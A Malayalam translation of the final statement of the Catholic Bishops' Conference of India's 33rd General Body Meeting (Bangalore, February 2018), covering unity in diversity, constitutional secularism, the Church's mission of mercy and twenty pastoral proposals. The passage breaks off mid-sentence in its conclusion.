സിബിസിഐ 33-ാം ജനറല്‍ബോഡി മീറ്റിങ്ങ്
ഭാരതീയ കത്തോലിക്കാ മെത്രാന്‍ സംഘം (സിബിസിഐ) ബാംഗ്ലൂര്‍, ഫെബ്രുവരി 2-9, 2018
കാരുണ്യത്തിന്‍റെയും സാക്ഷ്യത്തിന്‍റെയും ദൗത്യത്തിനായി
വൈവിധ്യത്തില്‍ ഐക്യപ്പെട്ട്: “യുഗാവസാനംവരെ ഞാന്‍ എപ്പോഴും നിങ്ങളോടുകൂടെ ഉണ്ടായിരിക്കും” (മത്താ. 28:20)
അന്തിമ പ്രസ്താവന
മുഖവുര
നമ്മുടെ ജനറല്‍ബോഡി മീറ്റിങ്ങിന്‍റെ പ്രമേയം ത്രിത്വരഹസ്യത്തെക്കുറിച്ചു ചിന്തിക്കാന്‍ നമ്മെ നേരിട്ടുക്ഷണിക്കുന്നു. നമ്മുടെ ക്രൈസ്തവ വിശ്വാസത്തിന്‍റെ അടിസ്ഥാനം പിതാവ്, പുത്രന്‍, പരിശുദ്ധാത്മാവ് എന്നീ മൂന്നു വ്യക്തികളില്‍ ഐക്യപ്പെട്ടിരിക്കുന്ന ഏക ദൈവമെന്ന മഹാരഹസ്യമാണ്.
ഇന്ത്യയിലെ കത്തോലിക്കാസഭയുടെ അനന്യമായ സ്വഭാവത്തെ ഓര്‍ത്ത് ദൈവത്തിനു നാം നന്ദിപറയുന്നു. അത് മൂന്ന് സ്വയം ഭരണാധികാരമുള്ള (Sui iuris) സഭകള്‍ ചേര്‍ന്നുണ്ടായതാണ്. പരിശുദ്ധ ത്രിത്വത്തിന്‍റെ കൂട്ടായ്മയെക്കുറിച്ച് ജീവിതത്തിലും ദൗത്യത്തിലും ചിന്തിക്കാന്‍ ഈ സഭകള്‍ വിളിക്കപ്പെട്ടിരിക്കുന്നു.
ഈ വീക്ഷണത്തില്‍ വേരുറച്ചവരായി ഞങ്ങള്‍, ഇന്ത്യയിലെ 184 മെത്രാന്മാര്‍ സിബിസിഐയുടെ 33-ാം ജനറല്‍ ബോഡി മീറ്റിങ്ങിനായി സമ്മേളിച്ചു. ബാംഗ്ലൂരിലുള്ള സെന്‍റ് ജോണ്‍സ് നാഷണല്‍ അക്കാദമി ഓഫ് ഹെല്‍ത്ത് സയന്‍സസ് എന്ന സ്ഥാപനത്തില്‍ 2018 ഫെബ്രുവരി 2 മുതല്‍ 9 വരെയുള്ള ദിവസങ്ങളിലായിരുന്നു സമ്മേളനം. അത് പ്രാര്‍ത്ഥിക്കാനും താഴെപ്പറയുന്ന പ്രമേയത്തെപ്പറ്റി ചിന്തിക്കാനുമായിരുന്നു: “കാരുണ്യത്തിന്‍റെയും സാക്ഷ്യത്തിന്‍റെയും ദൗത്യത്തിനായി വൈവിധ്യത്തില്‍ ഐക്യപ്പെട്ട്: യുഗാന്തംവരെ ഞാന്‍ എപ്പോഴും നിങ്ങളോടുകൂടെ ഉണ്ടായിരിക്കും” (മത്താ 28:20). നമ്മുടെതന്നെ തനിമയെപ്പറ്റിയുള്ള ധാരണയെ ആഴപ്പെടുത്താനും രാഷ്ട്രനിര്‍മ്മിതിക്കായുള്ള നമ്മുടെ സംഭാവനയെ വര്‍ധിപ്പിക്കാനുമാണത്: “കണ്ടാലും, യുഗാന്തംവരെ ഞാന്‍ എപ്പോഴും നിങ്ങളോടുകൂടെ ഉണ്ടായിരിക്കും” (മത്താ 28:20) എന്ന നമ്മുടെ കര്‍ത്താവിന്‍റെ വാക്കുകളാല്‍ ഞങ്ങള്‍ – ഭാരതീയ കത്തോലിക്കാ മെത്രാന്മാര്‍ – ഉറപ്പും ശക്തിയും കണ്ടെത്തി. 2017 നവംബര്‍ 17 മുതല്‍ 19 വരെ സമ്മേളിച്ച കാത്തലിക് കൗണ്‍സില്‍ ഓഫ് ഇന്ത്യ (സിസിഐ) യുടെ അന്തിമ പ്രസ്താവനകള്‍ ഞങ്ങള്‍ പരിഗണിച്ചു.
യേശുവിന്‍റെ ദൗത്യം
മനുഷ്യവംശത്തെ മുഴുവനും ദൈവത്തിന്‍റെ ഒറ്റ കുടുംബമായി ഐക്യപ്പെടുത്താനും അനുരഞ്ജിപ്പിക്കാനും വന്ന യേശുതന്നെയാണ് സദ്വാര്‍ത്ത. അവിടുന്ന് എല്ലാവരെയും സ്നേഹിച്ചവിധത്തില്‍ അതായത്, വിശക്കുന്നവരെ തീറ്റിപ്പോറ്റുന്നതിലും അസ്വസ്ഥരെ ആശ്വസിപ്പിക്കുന്നതിലും പാര്‍ശ്വവത്ക്കരിക്കപ്പെട്ടവരുടെ മഹത്ത്വത്തെ വളര്‍ത്തുന്നതിലും, രോഗികളെ സുഖപ്പെടുത്തുന്നതിലും പ്രത്യാശ ഇല്ലാത്തവര്‍ക്ക് പ്രത്യാശ നല്‍കുന്നതിലും അടിമകള്‍ക്കു സ്വാതന്ത്ര്യം നല്‍കുന്നതിലും പാപികള്‍ക്കു പാപപ്പൊറുതി നല്‍കുന്നതിലും ദരിദ്രര്‍ക്ക് നീതി നല്‍കുന്നതിലും മരിച്ചവര്‍ക്ക് ജീവന്‍ നല്‍കുന്നതിലും ദൈവത്തെ ജനങ്ങളുടെ മുമ്പില്‍ അവതരിപ്പിച്ചു.
ഭാരതത്തിലെ സഭ
ഭാരതത്തിലെ സഭ യേശുവിന്‍റെ അപ്പസ്തോലനായ വിശുദ്ധ തോമായിലൂടെ വിശ്വാസമെന്ന ദാനം സ്വീകരിച്ചു. പ്രേഷിതപ്രവര്‍ത്തനത്തിന്‍റെ മധ്യസ്ഥനായ വിശുദ്ധ ഫ്രാന്‍സീസ് സേവ്യറിനെപ്പോലുള്ള മഹാന്മാരായ അനേകം വിശുദ്ധരുടെ പരിശ്രമങ്ങള്‍വഴി നമ്മുടെ ക്രൈസ്തവവിശ്വാസം പോഷിപ്പിക്കപ്പെടുകയും ശക്തമാക്കപ്പെടുകയും ചെയ്തു. ഇന്ത്യയിലെ ക്രൈസ്തവവിശ്വാസം ക്രിസ്തുമതത്തോളം പഴക്കമുള്ളതാണെന്ന് ശക്തിയുക്തം ഉറപ്പിച്ചു പറയാന്‍ ഞങ്ങള്‍ ആഗ്രഹിക്കുന്നു. ഇന്ത്യ ഇന്ന് എന്തായിരിക്കുന്നുവോ അത് ഇന്ത്യയിലെ സഭയുടെ സംഭാവനകൊണ്ടുകൂടിയാണ്. സഭ മാന്യവും കാര്യക്ഷമവുമായ സേവനം ചെയ്തിട്ടുണ്ടെന്നതിന് തെളിവുണ്ട്. അതുകൊണ്ട് സഭയെ ഇന്ത്യയ്ക്ക് ആവശ്യമുണ്ടെന്നതു വ്യക്തമാണ്. നമ്മുടെ ഗുരുവായ യേശുവിനെ അനുകരിച്ച് സഭാംഗങ്ങള്‍ മാതൃരാജ്യത്തോടുള്ള സ്നേഹം തുര്‍ന്നുകൊണ്ടിരിക്കുന്നു. അവള്‍ ഓരോ ദരിദ്രനിലേക്കും ഓരോ അധ:കൃതനിലേക്കും എത്തിച്ചേരുന്നുണ്ടല്ലോ. എല്ലാ ജനങ്ങളും നമ്മുടെ സഹോദരീസഹോദരന്മാരാണെന്ന് സഭ വിശ്വസിക്കുന്നു. യേശുതന്നെ നമ്മെ പഠിപ്പിച്ചിട്ടുള്ളതുപോലെതന്നെ: “നീ നിന്‍റെ അയല്ക്കാരനെ നിന്നെപ്പോലെ തന്നെ സ്നേഹിക്കണം” (മത്താ 22:39). ദരിദ്രരെ ശക്തിപ്പെടുത്തല്‍, മനുഷ്യമഹത്ത്വത്തെ വളര്‍ത്തല്‍ എന്നിവ നമ്മുടെ ഭരണഘടനയില്‍ സൂക്ഷിച്ചിട്ടുള്ള മൂല്യങ്ങളാണ്. സഭയും തന്‍റെ ദൗത്യത്തില്‍ അങ്ങനെ ചെയ്യുന്നുണ്ട്. സഭ തന്‍റെ പ്രവര്‍ത്തനങ്ങളിലൂടെ നിര്‍വഹിക്കുന്ന ദൗത്യത്തിന് ഒരു ലക്ഷ്യമേ ഉള്ളൂ. സത്യം, നീതി, സ്നേഹം, സ്വാതന്ത്ര്യം എന്നിങ്ങനെയുള്ള സമാധാനത്തിന്‍റെ നാലുസ്തംഭങ്ങളില്‍ നമ്മുടെ രാഷ്ട്രത്തെ വളര്‍ത്തുകയെന്നതാണത് (Cf വിശുദ്ധ ജോണ്‍ 23-ാമന്‍, “ഭൂമിയില്‍ സമാധാനം”).
യഥാര്‍ത്ഥ ദേശീയതാവാദത്തെയും ഭരണഘടനാപരമായ മതേതരത്വത്തെയും മനസ്സിലാക്കല്‍
ഏതെങ്കിലും ഒരു പ്രത്യേക സംസ്കാരത്തെയോ മതത്തെയോ അടിസ്ഥാനപ്പെടുത്തിയിരിക്കുന്ന ദേശീയതാവാദത്തെ വളര്‍ത്താനുള്ള ഏതു പരിശ്രമവും അപകടകരമാണ്. അത് ഐകരൂപ്യത്തിലേക്കു നയിച്ചേക്കാം; പക്ഷേ ഒരിക്കലും യഥാര്‍ത്ഥ ഐക്യത്തിലേക്കു നയിക്കുകയില്ല. മിഥ്യാധാരണാപരമായ അത്തരം പരിശ്രമങ്ങള്‍ നമ്മുടെ രാഷ്ട്രത്തെ സ്വയം നശീകരണത്തിന്‍റെ പാതയിലൂടെയേ നയിക്കുകയുള്ളൂ. സമാധാനം, പുരോഗതി, വികസനം എന്നിവയ്ക്കായുള്ള അന്വേഷണത്തില്‍ ഏകസംസ്കാരവാദം ശരിയായ ഉത്തരമായിരുന്നിട്ടില്ല, ആയിരിക്കയുമില്ല. പ്രത്യേകിച്ച് സംസ്കാരവൈവിധ്യം, ഭാഷ, ദേശം, വംശം, മതം എന്നിവയുടെ സമ്പന്നമായ ഒരു രാജ്യത്ത് ഒരിക്കലും അങ്ങനെ ആവുകയില്ല. അക്രമം എപ്പോഴും അക്രമിയിലേക്കു തിരിച്ചുവരും – പെട്ടെന്നോ പില്ക്കാലത്തോ അങ്ങനെ സംഭവിക്കും. “എന്തെന്നാല്‍ വാള്‍ എടുക്കുന്നവന്‍ വാളാല്‍ മരിക്കും” (മത്താ. 26:52). സ്ത്രീകള്‍ക്കെതിരേ നടക്കുന്ന ക്രൂരകൃത്യങ്ങളെയും കൊലകളെയും വംശീയ മാത്സര്യങ്ങളെയും ക്രൈസ്തവസ്ഥാപനങ്ങള്‍ക്കും സമുദായങ്ങള്‍ക്കുമെതിരേയുള്ള സാമുദായിക അക്രമങ്ങളെയും ഞങ്ങള്‍ അപലപിക്കുന്നു. നമുക്ക് യഥാര്‍ത്ഥമായ ദേശീയതാവാദത്തിന്‍റെ പാത പിന്തുടരാം. അത് നമ്മുടെ മാതൃരാജ്യത്തെ യഥാര്‍ത്ഥ സമാധാനത്തിലേക്കും സമന്വയത്തിലേക്കും പുരോഗതിയിലേക്കും സമൃദ്ധിയിലേക്കും നയിക്കും. യഥാര്‍ത്ഥ ദേശീയതാവാദം ഓരോ പൗരന്‍റെയും മാനുഷിക മഹത്ത്വത്തെ ആദരിക്കുന്നു. സാമ്പത്തികസ്ഥിതിയോ സംസ്കാരമോ മതമോ ദേശമോ ഭാഷയോ പരിഗണിക്കാതെ അങ്ങനെ ചെയ്യുന്നു.
നമ്മുടെ ഭാരതീയ ഭരണഘടന ഉറപ്പുനല്‍കിയിട്ടുള്ള നിമയവാഴ്ചയെ ഉയര്‍ത്തിപ്പിടിക്കാന്‍ സന്മനസ്സുള്ള എല്ലാ മനുഷ്യരെയും നിര്‍ബന്ധിക്കുവാന്‍ ഞങ്ങള്‍ ആഗ്രഹിക്കുന്നു. അക്രമത്തിന്‍റെ അന്തരീക്ഷത്തില്‍ സമാധാനത്തിനുവേണ്ടി ജനക്കൂട്ട സംസ്കാരവും ജനക്കൂട്ടം നിയമം കയ്യിലെടുക്കുന്നതും ഒഴിവാക്കാന്‍ നമ്മുടെ എല്ലാ സഹപൗരന്മാരോടും ഞങ്ങള്‍ അഭ്യര്‍ത്ഥിക്കുന്നു. നമ്മുടെ രാജ്യത്ത് എല്ലാവരുടെയും പുരോഗതിയും വികസനവും ഉറപ്പുവരുത്താനും പരിസ്ഥിതി സംരക്ഷിക്കാനും വേണ്ടി നിയമവും ക്രമസംവിധാനവും നിലനിറുത്താന്‍ സര്‍ക്കാര്‍ ചെയ്യുന്ന എല്ലാ പരിശ്രമങ്ങളെയും ഞങ്ങള്‍ വിലമതിക്കുകയും അവയോട് സഹകരിക്കുകയും ചെയ്യുന്നു. നമ്മുടെ രാഷ്ട്രപിതാവായ മഹാത്മാഗാന്ധി വ്യക്തമായ വാക്കുകളിലൂടെ ഇങ്ങനെ പ്രസ്താവിച്ചിട്ടുണ്ട്. “ഓരോ വ്യക്തിയുടെയും ആവശ്യത്തിനുവേണ്ടത് ലോകത്തിലുണ്ട്. എന്നാല്‍ ഓരോ വ്യക്തിയുടെയും അത്യാഗ്രഹത്തെ തൃപ്തിപ്പെടുത്താന്‍ വേണ്ടത് ലോകത്തിലില്ല.”
മനുഷ്യജീവന്‍ എന്ന അമൂല്യദാനം
ദൈവം തന്ന അമൂല്യദാനമായ മനുഷ്യജീവന്‍റെ പരിപൂര്‍ണവും അതിശായിത്വരവുമായ മൂല്യത്തെ ക്രൈസ്തവസമൂഹം ഉയര്‍ത്തിപ്പിടിക്കുന്നു. അതുകൊണ്ട് മനുഷ്യജീവന് എതിരായ ഒരു ആക്രമണവും ഒരിക്കലും ദൈവത്താല്‍ പ്രചോദിപ്പിക്കപ്പെട്ടതാവുകയില്ല. വ്യത്യസ്ത വിശ്വാസങ്ങളുടെയും ആചാരങ്ങളുടെയും അടിസ്ഥാനത്തില്‍ അത് ഒരിക്കലും നീതീകരിക്കാനും സാധ്യമല്ല. നമ്മുടെ പ്രിയപ്പെട്ട മാതൃരാജ്യത്തിലെ ഓരോ വ്യക്തിയുടെയും ജീവനെ വിലമതിക്കുകയും സംരക്ഷിക്കുകയും വേണം.
സഭയുടെ കാരുണ്യദൗത്യം
ദൈവത്തിന്‍റെ ഹൃദയത്തില്‍നിന്നു മാത്രമാണ് കാരുണ്യം ഒഴുകുന്നത്. യേശുക്രിസ്തുവിന്‍റെ കുരിശിലൂടെ അത് ഒഴുകുന്നു. ആ കാരുണ്യത്തിനുമാത്രമേ മുറിവേറ്റ മനുഷ്യഹൃദയങ്ങളെ സുഖപ്പെടുത്താനും വ്യക്തികളും സമുദായങ്ങളും തമ്മിലുണ്ടാകുന്ന ബന്ധങ്ങളുടെ തകര്‍ച്ച് പരിഹരിക്കാനും നൂറ്റാണ്ടുകളായി അടിച്ചമര്‍ത്തപ്പെട്ടവരെ ദുരിതത്തില്‍നിന്നു രക്ഷിക്കാനും സാധിക്കുകയുള്ളൂ. യേശുക്രിസ്തുവിന്‍റെ ശിഷ്യന്മാരായ ഞങ്ങള്‍ അപകടകരമായ ഈ അവസ്ഥ നേരിടുമ്പോള്‍ കാരുണ്യത്തിന്‍റെ യഥാര്‍ത്ഥ സാക്ഷികളാകാന്‍ ശപഥംചെയ്യുന്നു. കാരുണ്യമാണ് സുവിശേഷത്തിന്‍റെ സത്തയും ക്രൈസ്തവ ശിഷ്യത്വത്തിന്‍റെ പ്രകാശനവും. കല്‍ക്കട്ടയിലെ വിശുദ്ധ തെരേസയുടെ മൃദുലമായ കൈകളും ചുളിവുള്ള മുഖവും ഇന്‍ഡോറിലെ വാഴ്ത്തപ്പെട്ട റാണിമരിയയുടെ രക്തസാക്ഷിത്വവും ഇതിനു സാക്ഷ്യം വഹിക്കുന്നു.
ക്രൈസ്തവരായ ഞങ്ങള്‍ രാഷ്ട്രത്തിനുവേണ്ടി – പ്രത്യേകിച്ച് ദളിതര്‍ ഗ്രോത്രവര്‍ഗക്കാര്‍, പിന്നോക്കം നില്‍ക്കുന്ന മറ്റു ജനസമൂഹങ്ങള്‍ എന്നിവര്‍ക്കുവേണ്ടി – ചെയ്യുന്ന സേവനത്തില്‍ ഞങ്ങളുടെ സഹപൗരന്മാരുമായി കൈകോര്‍ത്തു പിടിക്കുന്നു. നമ്മുടെ ജനതയുടെ യഥാര്‍ത്ഥ മാനുഷിക വികസനം ഉറപ്പാക്കാന്‍ വേണ്ടിയാണത്. ആ വികസനം കേവലം സാമ്പത്തിക മാനദണ്ഡങ്ങളനുസരിച്ചല്ല, പിന്നെയോ മാനുഷിക മാനദണ്ഡമനുസരിച്ചാണ് അളക്കപ്പെടുന്നത്.
ഏതു തരത്തിലുമുള്ള ഇടുങ്ങിയ ആഭ്യന്തര മതില്‍ക്കെട്ടുകള്‍ക്ക് അപ്പുറത്തേക്ക് ഇറങ്ങാന്‍ നമുക്ക് എല്ലാവര്‍ക്കും ശപഥംചെയ്യാം. യഥാര്‍ത്ഥത്തില്‍ മതേതരത്വപരവും സോഷ്യലിസപരവും ജനാധിപത്യപരവുമായ ഒരു രാഷ്ട്രം സ്ഥാപിക്കാന്‍ വേണ്ടിയാണത്. ഇന്ത്യന്‍ ഭരണഘടനയില്‍ പ്രതിഷ്ഠിച്ചിട്ടുള്ള തരത്തിലുള്ള രാഷ്ട്രം തന്നെ.
സഭയിലും രാഷ്ട്രത്തിലും വൈവിധ്യങ്ങളുടെയിടയില്‍ ഐക്യപ്പെട്ടു ജീവിക്കാന്‍ ഞങ്ങള്‍ താഴെപ്പറയുന്ന നിര്‍ദ്ദേശങ്ങള്‍ മുന്നോട്ടുവയ്ക്കുന്നു.
1. ശിഷ്യത്വപരമായ നമ്മുടെ ക്രൈസ്തവജീവിതം എല്ലാ തലങ്ങളിലും ആഴപ്പെടുത്താനും തീവ്രതയുള്ളതാക്കാനും അതിനായി നിരന്തരം പ്രാര്‍ത്ഥിക്കുന്ന സമുദായമായി നിലനിന്നുകൊണ്ട് ത്രിത്വാത്മകവിശ്വാസത്തിനുചേര്‍ന്ന വിധം എപ്പോഴും വൈവിധ്യത്തില്‍ ഐക്യത്തോടെ ജീവിക്കണം.
2. അല്മായരും സന്യസ്തരും വൈദികരും തമ്മിലുള്ള ബന്ധം ശക്തിപ്പെടുത്തണം. എല്ലാതലങ്ങളിലും ആ കൂട്ടായ്മ സഭാജീവിതത്തിന്‍റെ മാര്‍ഗമാണെന്ന് ഉറപ്പുവരുത്തണം.
3. ലഘുക്രൈസ്തവസമൂഹങ്ങളെയും (SCCs) കുടുംബയൂണിറ്റുകളെയും വളര്‍ത്തുകയും തീവ്രതരമാക്കുകയും വേണം. വിശ്വാസികളുടെ സമഗ്രമായ, സര്‍വ്വതലസ്പര്‍ശിയായ, പരിശീലനത്തിനും മതാന്തര സഹകരണത്തിനും സമാധാനത്തിനും സമന്വയത്തിനും വേണ്ടിയാണത്.
4. ലോകത്തില്‍ കുടുംബങ്ങള്‍ നടത്തുന്ന സുവിശേഷവത്ക്കരണ ദൗത്യത്തില്‍ അവരോടൊപ്പമായിരിക്കുകയും അവ സഭയുടെ അജപാലനശുശ്രൂഷയുടെ ശ്രദ്ധാകേന്ദ്രമായിത്തീരുന്നുണ്ടെന്ന് ഉറപ്പുവരുത്തുകയും വേണം. ക്ലേശിച്ചു കഴിയുന്ന കുടുംബങ്ങളോട് സവിശേഷശ്രദ്ധയും സഹതാപവും കാണിക്കണം. ഉത്തരവാദിത്വപൂര്‍ണമായ പിതൃത്വത്തെക്കുറിച്ച് അവര്‍ക്ക് വെളിച്ചം നല്‍കണം.
5. നമ്മുടെ യുവജനത്തെ യഥാര്‍ത്ഥ ക്രൈസ്തവ ജീവിതത്തെക്കുറിച്ചുള്ള ദര്‍ശനംകൊണ്ടു നിറയ്ക്കണം. സഭയിലും സമൂഹത്തിലും അവര്‍ക്കുള്ള ധര്‍മ്മം നിര്‍വഹിക്കാന്‍ അവരെ ശക്തരാക്കണം. നമ്മുടെ യുവജനത്തെ ദൈവവചനത്തെയും സഭയുടെ പ്രബോധനങ്ങളെയും സംബന്ധിച്ച അറിവുള്ളവരാക്കിത്തീര്‍ത്തുകൊണ്ട് സഭയില്‍ സജീവധര്‍മ്മം നിര്‍വഹിക്കാന്‍ ശക്തിപ്പെടുത്തണം. ഇന്ത്യന്‍ കാത്തലിക് മൂവ്മെന്‍റ് (ICYM), മറ്റുള്ള കത്തോലിക്കാ യുവജനപ്രസ്ഥാനങ്ങള്‍ എന്നിവയിലൂടെ അങ്ങനെ ചെയ്യണം. നമ്മുടെ യുവജനങ്ങളെ ദൈവവിളി തിരിച്ചറിയാനും ജീവിതപാത തിരഞ്ഞെടുക്കാനും സഹായിക്കാനാണത്. യുവജനങ്ങളെ സംബന്ധിച്ച് 2018 ഒക്ടോബറില്‍ നടത്താനിരിക്കുന്ന സിനഡിന്‍റെ പ്രഥമ പ്രമേയം അതാണ്.
6. നമ്മുടെ അല്മായരെയും യുവജനത്തെയും രാഷ്ട്രനിര്‍മ്മാണത്തിന് പ്രോത്സാഹിപ്പിക്കയും പരിശീലിപ്പിക്കയും ചെയ്യണം. രാഷ്ട്രീയം, സിവില്‍ സര്‍വീസ്, രാജ്യരക്ഷ, നിയമം, ജുഡീഷ്യറി എന്നിങ്ങനെയുള്ള ദേശീയ ജീവിതത്തിന്‍റെ സുപ്രധാന മേഖലകളില്‍ ഉള്‍പ്പെട്ടുകൊണ്ടാണ് അവര്‍ അങ്ങനെ ചെയ്യേണ്ടത്.
7. സ്ത്രീകള്‍ക്കുള്ള തുല്യമഹത്ത്വത്തെ അംഗീകരിക്കാനും സഭയുടെ ജീവിതത്തിലും ദൗത്യത്തിലും അല്മായര്‍ക്കുള്ള പങ്കിനെ വളര്‍ത്താനും ഉതകുന്ന പരിശീലനം സഭയുടെ പരിശീലന ഭവനങ്ങളില്‍ ലഭിക്കുന്നുണ്ടെന്ന് ഉറപ്പു വരുത്തണം.
8. സഭയുടെ എല്ലാ സംഘങ്ങളിലും സ്ത്രീകള്‍ക്ക് പര്യാപ്തമായ പ്രാതിനിധ്യം ഉറപ്പുവരുത്തണം.
9. സഭയിലും സമൂഹത്തിലും കരുണയുടെ യഥാര്‍ത്ഥ സാക്ഷികളായിരിക്കാന്‍ സെമിനാരി വിദ്യാര്‍ത്ഥികളെയും വൈദികരെയും സന്യസ്തരെയും സജ്ജീകൃതരാക്കണം.
10. മതാന്തര സംവാദം വളര്‍ത്താനുള്ള എല്ലാ അവസരവും ഉപയോഗിക്കണം. ക്രിസ്തുവിലുള്ള നമ്മുടെ ഐക്യത്തെ വളര്‍ത്താന്‍ ക്രൈസ്തവരായ നാം എല്ലാ പരിശ്രമവും ചെയ്താല്‍ നമ്മുടെ മതാന്തര സംവാദം കൂടുതല്‍ വിശ്വസനീയമാകും.
11. എക്യുമെനിക്കല്‍ ഗ്രൂപ്പുകള്‍ തമ്മിലുള്ള സംവാദത്തിലൂടെയും പൊതുവായ എക്യുമെനിക്കല്‍ സേവനങ്ങള്‍, പൊതുവായ പ്രാര്‍ത്ഥനകള്‍, പൊതുവായ പ്രവര്‍ത്തനങ്ങള്‍ എന്നിവയിലൂടെയും ക്രൈസ്തവര്‍ തമ്മില്‍ കൂടുതല്‍ നല്ല സഹകരണം വളര്‍ത്താന്‍ വിവിധ സംരംഭങ്ങള്‍ തുടങ്ങണം.
12. സഭയുടെയും സമുദായത്തിന്‍റെയും എല്ലാ മേഖലകളിലും ഇന്ത്യയുടെ ഭരണഘടന കൂടുതല്‍ വ്യാപകമായി അറിയപ്പെടാന്‍ പരിശ്രമിക്കണം. എല്ലാ പൗരന്മാരുടെയും തുല്യത, മതസ്വാതന്ത്ര്യം, മനസാക്ഷി സ്വാതന്ത്ര്യം, അഭിപ്രായസ്വാതന്ത്ര്യം എന്നീ സുപ്രധാന സവിശേഷതകളെ ഉയര്‍ത്തിക്കാണിച്ചുകൊണ്ടും അങ്ങനെ ചെയ്യണം.
13. പൊതുസമൂഹത്തില്‍ കൂടുതല്‍ സജീവമായി പ്രവര്‍ത്തിക്കാന്‍ അല്മായരെ പ്രോത്സാഹിപ്പിക്കുകയും പ്രചോദിപ്പിക്കുകയും വേണം. അവരുടെ വിളിയനുസരിച്ച് പ്രവര്‍ത്തിച്ചുകൊണ്ട് രാഷ്ട്രനിര്‍മ്മാണത്തിന് അവര്‍ കാര്യക്ഷമമായ സംഭാവന നല്‍കാനാണത്.
14. വിദ്യാഭ്യാസ മണ്ഡലത്തില്‍ കാരുണ്യത്തിന്‍റെ ദൗത്യം നിര്‍വഹിക്കാനുള്ള നമ്മുടെ സേവനങ്ങള്‍ തുടരണം. സിബിസിഐയുടെ “All India Catholic Education Poicy 2007” എന്ന നയം ബോധപൂര്‍വ്വം നിറവേറ്റാനാണത്. സുവിശേഷമൂല്യങ്ങളെ നല്‍കാന്‍വേണ്ടിത്തന്നെ.
15. കത്തോലിക്കാ ഹെല്‍ത്ത് സര്‍വീസുകളെ കാരുണ്യത്തിന്‍റെയും കഴിയുന്നത്ര സൗഖ്യദാനത്തിന്‍റെയും ഒരു ദൗത്യമാക്കണം. അത് സഹതാപപൂര്‍ണവും പരിരക്ഷണപരവുമായിരിക്കണം. എന്നാലും അത് സുസജ്ജവും സ്വയം നിലനില്‍ക്കാനാവുന്നതും സഹകരണപരവുമായിരിക്കണം.
16. സിബിസിഐ യുടെ ദളിത് ശാക്തീകരണ പോളിസി ഓരോ രൂപതയിലും നിറവേറ്റപ്പെടുന്നുണ്ടെന്ന് ഉറപ്പുവരുത്തണം. ഗോത്രവര്‍ഗ്ഗക്കാരുടെയും മറ്റുള്ള പിന്നാക്കവര്‍ഗ്ഗക്കാരുടെയും സംരക്ഷണത്തിനും സമഗ്രമായ വികസനത്തിനുംവേണ്ടി അധ്വാനിക്കണം. കൃഷിക്കാര്‍, മീന്‍പിടുത്തക്കാര്‍, കുടിയേറ്റക്കാര്‍ എന്നിവരും നിസ്സഹായരും ചൂഷണം ചെയ്യപ്പെട്ടവരുമായവര്‍ക്ക് ആശ്വാസവും ക്ഷേമവും നല്‍കാന്‍ സവിശേഷസംരംഭങ്ങള്‍ തുടങ്ങണം. അവരുടെ അസ്വസ്ഥതയില്‍ അവര്‍ക്ക് ശുശ്രൂഷയും ആശ്വാസവും പ്രത്യാശയും നല്‍കുവാനാണത്.
17. നമ്മുടെ ക്രൈസ്തവ സമര്‍പ്പണത്തിന്‍റെയും ആധ്യാത്മികതയുടെയും സത്താപരമായ ഭാഗമെന്ന നിലയില്‍ പരിസ്ഥിതിക്കുള്ള പ്രാധാന്യത്തെ സംബന്ധിച്ച ബോധം വര്‍ധിപ്പിക്കണം. പരിസ്ഥിതിയെ സംരക്ഷിക്കാനും പ്രകൃതിയോടുള്ള സ്നേഹം വര്‍ധിപ്പിക്കാനും പുതിയ സംരംഭങ്ങള്‍ തുടങ്ങണം. ഫ്രാന്‍സീസ് മാര്‍പാപ്പായുടെ ചാക്രികലേഖനമായ ‘ലാവുദാത്തോ സീ’യിലുള്ള പ്രബോധനങ്ങള്‍ നിറവേറ്റാന്‍ ഓരോ രൂപതയും ഒരു പരിസ്ഥിതിനയം രൂപീകരിച്ചിട്ടുണ്ടെന്ന് ഉറപ്പുവരുത്തണം.
18. തടവറയിലായിരിക്കുന്ന നമ്മുടെ സഹോദരീ സഹോദരന്മാരുടെ ദുരിതാവസ്ഥയെക്കുറിച്ചുള്ള ബോധം സൃഷ്ടിക്കണം. അവരെ പുനരധിവസിപ്പിക്കുന്നതിനും അവരുടെ കുടുംബങ്ങളെ പരിപാലിക്കുന്നതിനും സഹായിക്കണം.
19. സഭയുടെ ഭരണനിര്‍വഹണത്തിന്‍റെ സകല മണ്ഡലങ്ങളിലും സുതാര്യത ഉറപ്പുവരുത്തണം. സമൂഹത്തിലെ സുതാര്യതയ്ക്കായി നിലകൊള്ളുകയും വേണം.
20. നമ്മുടെ എല്ലാ രൂപതകള്‍ക്കും കാര്യക്ഷമമായ ഒരു “ചിന്താകേന്ദ്രം” ഉണ്ടായിരിക്കണം. അടിയന്തിര സ്വഭാവമുള്ള കാര്യങ്ങള്‍ ഏറ്റെടുക്കാനും ബന്ധപ്പെട്ട എല്ലാവരോടും ഉത്സാഹപൂര്‍വ്വം സംവദിക്കാനുമാണത്.
ഉപസംഹാരം
“സഭ നിലകൊള്ളുന്നത് സുവിശേഷവത്കരണം നടത്താനാണ്. അതായത്, പ്രഘോഷിക്കാനും പഠിപ്പിക്കാനും ദൈവകൃപയാകുന്ന ദാനത്തിന്‍റെ ചാനലാകാനും പാപികളെ ദൈവവുമായി അനുരഞ്ജിപ്പിക്കാനും വേണ്ടിയാണത്” (വാഴ്ത്തപ്പെട്ട പോള്‍ 6-ാമന്‍, പ്രഘോഷിക്കപ്പെടേണ്ട സുവിശേഷം, നമ്പര്‍ 14). “സുവിശേഷവത്കരിക്കാനാണ് സഭയും ദൈവശാസ്ത്രവും നിലകൊള്ളുന്നത്, ക്ലാസ് റൂം ദൈവശാസ്ത്രംകൊണ്ടു തൃപ്തിപ്പെടാനല്ല” (ഫ്രാന്‍സീസ് മാര്‍പാപ്പാ, സുവിശേഷത്തിന്‍റെ സന്തോഷം, നമ്പര്‍ 133). നമ്മുടെ രാഷ്ട്രത്തിന്‍റെ വൈവിധ്യത്തില്‍ ഐക്യം എന്നതിനുണ്ടാകുന്ന ഗൗരവപൂര്‍ണായ വെല്ലുവിളികളെയും പരാജയങ്ങളെയും നാം നേരിടുന്നുണ്ട്. എങ്കിലും ഭാരതീയരായിരിക്കുന്നതില്‍ നാം അഭിമാനം കൊള്ളുന്നു. നാം നമ്മുടെ രാജ്യത്തെ സ്നേഹിക്കുന്നു. അതിനുവേണ്ടിയും അതിന്‍റെ ക്ഷേമത്തിനുവേണ്ടിയും നാം നിരന്തരം പ്രാര്‍ത്ഥിച്ചുകൊണ്ടിരിക്കുന്നു. വൈവിധ്യത്തിലുള്ള ഐക്യത്തിനായുള്ള പ്രവര്‍ത്തനം 